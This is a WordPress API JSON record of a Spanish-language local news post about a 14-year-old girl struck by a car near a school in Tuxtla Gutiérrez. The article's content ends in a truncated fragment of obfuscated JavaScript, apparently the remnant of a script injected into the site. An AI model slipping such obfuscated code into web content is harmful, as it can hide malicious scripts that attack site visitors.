{"id":7356,"date":"2022-12-16T03:18:04","date_gmt":"2022-12-16T03:18:04","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=7356"},"modified":"2022-12-16T03:18:05","modified_gmt":"2022-12-16T03:18:05","slug":"menor-de-edad-fue-atropellada-en-la-zona-oriente-de-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=7356","title":{"rendered":"Menor de edad fue atropellada en la zona Oriente de Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221215-WA0018-1024x768.jpg\" alt=\"\" class=\"wp-image-7357\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221215-WA0018-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221215-WA0018-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221215-WA0018-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221215-WA0018.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 15 de diciembre del 2022. Tuxtla Guti\u00e9rrez.- Este jueves fue atropellada una menor de edad cuando caminaba en la zona Oriente de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, fue un veh\u00edculo Nissan tipo March con n\u00famero econ\u00f3mico 0912 que circulaba en el carril de Poniente a Oriente que embisti\u00f3 a la joven de 14 a\u00f1os de edad, que qued\u00f3 tendida sobre el pavimento a la altura de la escuela secundaria federal Joaqu\u00edn Miguel Guti\u00e9rrez cerca de Convivencia Infantil.<\/p>\n\n\n\n<p>Testigos relataron que la joven se atraves\u00f3 de Norte a Sur sin precauci\u00f3n.<\/p>\n\n\n\n<p>Fue el mismo personal de la escuela que la auxili\u00f3 y llam\u00f3 a los n\u00fameros de emergencias.<\/p>\n\n\n\n<p>Param\u00e9dicos de Protecci\u00f3n civil municipal arribaron al lugar para prestar los servicios prehospitalarios y no fue trasladada a un nosocomio.<\/p>\n\n\n\n<p>En el lugar el responsable se hizo cargo de los gastos m\u00e9dicos y se retiraron del lugar.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 15 de diciembre del 2022. Tuxtla Guti\u00e9rrez.- Este jueves fue atropellada una menor de edad cuando caminaba en la zona Oriente de Tuxtla Guti\u00e9rrez. Los reportes oficiales informaron que, fue un veh\u00edculo Nissan tipo March con n\u00famero econ\u00f3mico 0912 que circulaba en el carril de Poniente a Oriente que embisti\u00f3 a &hellip;<\/p>\n","protected":false},"author":2,"featured_media":7357,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-7356","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7356","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7356"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7356\/revisions"}],"predecessor-version":[{"id":7358,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7356\/revisions\/7358"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/7357"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7356"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7356"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7356"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}